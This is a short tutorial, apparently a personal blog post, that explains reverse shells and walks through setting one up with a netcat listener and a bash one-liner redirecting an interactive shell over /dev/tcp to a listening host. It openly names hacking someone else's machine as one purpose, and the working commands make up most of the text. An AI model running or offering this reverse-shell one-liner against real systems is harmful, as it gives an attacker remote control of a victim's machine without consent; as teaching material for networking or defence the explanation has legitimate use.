Hello everyone! In this tutorial I'm going to show you how to make a reverse shell! You will need two machines. I'm using two Linux based systems.
First, what is a reverse shell ?
Usually, when you make a TCP/IP connection between two computers, there is from one side a server handling the connection, and from the other a client making the connection.
When you connect to your machine using SSH (for example), you (CLIENT) are controlling the distant machine (SERVER). Making a reverse shell allows the SERVER to control the CLIENT.
Now you may wonder what is the point of doing this... Well, it can be actually very useful. Right now I'm seeing two main reasons:
- You want to help a friend. He doesn't have a server with all the port forwarding etc, so you can't connect to his machine. Reverse shell: he connects to your computer, and you control his.
- Not as ethical as the first reason, but still works! You're an evil guy, you want to hack a machine, you can use a reverse shell.
Let's do it!
We are going to use netcat on the server side. Netcat is a networking utility used for reading or writing from TCP and UDP sockets.
First, we are going to listen for incoming connection using netcat:
# syntax is: nc -l -vv -p <PORT>
# -l : listen (server mode)
# -vv : verbose mode (get outputs from nc)
# -p : the port used for the server. Unless you and the client are on the same network, you have to make a port forwarding to your machine
# in my case, this is the command:
nc -l -vv -p 1111
Once the command started you should have something like this:
Now go to the client. We are going to redirect the standard input/output/error of the client bash to the server. This is how we do it:
# syntax is: bash -i &> /dev/tcp/<IP>/<PORT> 0>&1
# bash -i : interactive bash
# &> /dev/tcp/<IP>/<PORT> : redirects the standard output (1) and error (2) of the bash to the server
# 0>&1 : link the standard input (0) of the bash to the output (1)
# <IP> and <PORT> are the ip of the server and the port on which you started it
# for me it would be:
bash -i &> /dev/tcp/192.168.0.5/1111 0>&1
# if you're on the same network, you could also use localhost
Note: I'm using a local IP because I'm using two computers on the same network, but it could have been /aflak.me/1111.
If you want to know more about the redirection operators this is a good link: Bash Redirections.
Here is the result:
This is it! I have access to the client's bash!
I hope you liked the tutorial. Leave some comments!